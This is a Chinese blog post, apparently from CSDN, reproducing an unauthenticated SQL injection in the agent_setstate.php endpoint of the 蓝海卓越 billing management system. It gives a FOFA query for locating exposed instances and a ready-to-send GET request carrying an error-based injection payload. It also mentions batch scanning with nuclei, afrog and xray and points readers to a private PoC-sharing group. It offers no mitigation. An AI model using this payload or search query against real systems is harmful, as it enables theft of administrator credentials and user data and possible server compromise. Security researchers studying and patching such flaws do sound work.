【漏洞复现】蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞

已于 2024-05-24 21:04:56 修改
阅读量273 收藏 4
点赞数 12
分类专栏: 漏洞复现篇 文章标签: sql 蓝海卓越
于 2024-05-24 21:03:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139184285
版权

0x01 产品简介

蓝海卓越计费管理系统是一套以实现网络运营为基础,增强全局安全为中心,提高管理效率为目的的网络安全运营管理系统,提供"高安全、可运营、易管理”的运营管理体验,基于标准的RADIUS协议开发,它不仅支持PPPOE和WEB认证计费,还支持802.1X接入控制技术,与其他厂商支持相应标准的产品兼容,结合蓝海卓越的PPPOE服务器网关,可提供更加丰富的功能。,另外,友好的Web访问管理的方式,为用户提供更好用、易用的方式,更贴心的使用形式。

0x02 漏洞概述

蓝海卓越计费管理系统 agent_setstate.php 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 搜索语法

FOFA:  title=="蓝海卓越计费管理系统"

在这里插入图片描述

0x04 漏洞复现

GET /agent_setstate.php?id=(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(0x717a767071,(SELECT%20(ELT(6154=6154,1))),0x7170716a71,0x78))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Connection: close

在这里插入图片描述
sqlmap验证
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 12
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞复现
0xSec
05-24 577
蓝海卓越计费管理系统 agent_setstate.php 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
蓝海卓越计费管理系统 download.php 任意文件读取漏洞
失心少年
06-26 418
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 …/ 遍历目录可以读取服务器上的敏感文件。出现漏洞的文件为 download.php ,其中 file参数 存在用户可控。title==“蓝海卓越计费管理系统蓝海卓越计费管理系统
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 735
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
孤桜懶契
04-18 2806
漏洞描述 i ⭐蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行 漏洞影响 s ✅蓝海卓越计费管理系统 空间测绘 d ⭕Hunter:web.title="蓝海卓越计费管理系统" 漏洞复现 ✅访问首页 ✅执行Payload命令,访问路径/debug.php $ ifconfig eth0 Link encap:Ethernet HWaddr 00:21:9B:FB:30:27 inet addr:192.168.0.1 Bcast:192.168.
实战 - 蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
HAKUNAMATATATTA的博客
05-30 380
蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行。
Python 使用 __getstate__ 和 __setstate__ 魔法方法
热门推荐
jianghuixin
11-13 1万+
2021-03-21 更新 __getstate__ 与 __setstate__ 两个魔法方法分别用于Python 对象的序列化与反序列化 在序列化时, _getstate__ 可以指定将那些信息记录下来, 而 __setstate__ 指明如何利用已记录的信息
06-react-setState.md
03-31
大厂前端面试题目|# 开始 遇到一个需求、问题或者一段代码,如何能高效的分析、解决它,这是前端程序员的必备技能。否则你将无法独立工作,这不是企业需要的人才。本章将通过多个面试题,教你如何分析问题、解决...
前端大厂最新面试题-setState.docx
06-06
React中的setState执行机制详解 在 React 中,setState 是一个非常重要的方法,它用于更新组件的状态从而引发视图的更新。在本文中,我们将深入探讨 setState 的执行机制,并分析其异步更新和同步更新的差异。 一...
前端大厂最新面试题-state_props.docx
06-06
* Props 是外部传递给组件的,而 State 是在组件内被组件自己管理的,一般在 constructor 中初始化 * Props 在组件内部是不可修改的,但 State 在组件内部可以进行修改 * State 是多变的、可以修改 State 和 Props ...
浅谈使用React.setState需要注意的三点
08-28
浅谈使用React.setState需要注意的三点 在 React 中,使用 setState 是一件很复杂的事情,即使是熟练的 React 开发,也很有可能因为 React 的一些机制而产生一些 bug。因此,在使用 setState 时需要注意三个问题: ...
react配合antd组件实现的管理系统示例代码
08-27
React 配合 Antd 组件实现的管理系统示例代码 这篇文章主要介绍了使用 React 配合 Antd 组件实现的管理系统示例代码,涵盖了 React、Redux、Antd、Webpack 等技术栈。下面是从这篇文章中提炼出来的知识点: 一、...
SQLAlchemy 连接池
youhebuke225的博客
06-17 233
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。记得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。
PostgreSQL源码分析——CREATE DATABASE
让我思考一下
06-18 563
这里我们分析一下在PostgreSQL中创建数据库的源码,在分析源码之前,最好先阅读《PostgreSQL指南内幕探索》的第一章,数据库集簇、数据库和数据表,弄清其空间布局,理解PG中,数据库、表、元组是怎么布局的。通俗一点说,创建一个数据库相当于创建一个数据目录,在这个目录下,存放该数据库中定义的表、索引等对象。
PostgreSQL源码分析——INSERT
最新发布
让我思考一下
06-18 285
这里我们对INSERT语句进行分析, 只分析其宏观过程,具体细节后续再分析。我们就分析下面的语句的执行过程。
PostgreSQL源码分析——CREATE TYPE
让我思考一下
06-18 342
定义一个复合类型某种程度上就是定义一张新的表,表的rowtype就是复合类型。会看到创建一个复合类型的同时会创建一个同名的表。这个表可以在pg_class系统表中查到,但是通过\d等却查不到,也不能想表中插入数据,因为它并不是真正意义上的表,只是用表实现复合类型。这部分因为不是可优化语句,没有什么处理。这部分因为是Utility语句,没有什么处理的。创建复合类型,我们分析一下其源码实现。
PostgreSQL源码分析 —— 除法运算符
让我思考一下
06-18 348
我们分析一下在PostgreSQL数据库中,是如何实现除法操作的。其他的运算符操作与之类似。
NL2SQL技术方案系列(1):NL2API、NL2SQL技术路径选择;LLM选型与Prompt工程技巧,揭秘项目落地优化之道
2401_85325726的博客
06-15 726
NL2SQL任务的目标是将用户对某个数据库的自然语言问题转化为相应的SQL查询。随着LLM的发展,使用LLM进行NL2SQL已成为一种新的范式。在这一过程中,如何利用提示工程来发掘LLM的NL2SQL能力显得尤为重要。数据结构****复杂:企业信息系统的数据结构复杂性远远超过几个简单的 Excel 文件,一个大型企业应用可能存在几百上千个数据实体,所以在实际应用中,大型 BI 系统会在前端经过汇聚、简化与抽象成新的语义层,方便理解。数据量较大。
PostgreSQL源码分析——CREATE CAST
让我思考一下
06-18 321
语句自定义一个类型转换,数据库肯定有个地方将这个转换的信息存起来,这个地方就是pg_cast系统表。pg_cast系统表存在数据类型转换路径,包括内建和用户自定义的。函数的主要内容就是将用户自定义的类型转换信息插入到pg_cast系统表中。下面我们主要分析一下其源码,看一下是如何实现的。我们首先分析一下其语法解析部分,这部分比较简单,核心是。如何使用以及用法请参考PostgreSQL文档中。后续会重点分析一下这个函数。—— 定义一个用户自定义的类型转换。非常容易理解,下面我们重点分析一下。
def __getstate__(self): # 在pickle之前拷贝类字典,然后删除pool值,最后返回 self_dict = self.__dict__.copy() del self_dict['pool'] return self_dict def __setstate__(self, state): # 在pickle之后将其更新 self.__dict__.update(state)
07-15
你的 `__getstate__()` 和 `__setstate__()` 方法看起来是正确的。在 `__getstate__()` 方法中,你创建了一个副本 `self_dict`,删除了 `self_dict` 中的 `'pool'` 键,并返回了剩余的字典。而在 `__setstate__()` 方法中,你使用传入的状态字典 `state` 来更新对象的字典。 这样的实现应该能够解决你遇到的 `PicklingError` 错误。通过删除 `'pool'` 键,你确保了 `AppBase.AliyunBase_android` 类的实例在被序列化时不会包含 `'pool'` 属性。 请确保在使用 `multiprocessing.Queue()` 传递类之前,已经正确地实现了 `__getstate__()` 和 `__setstate__()` 方法,并且类定义可被 pickle 库找到。如果问题仍然存在,请提供更多的代码和错误信息,以便我能够更好地帮助你解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值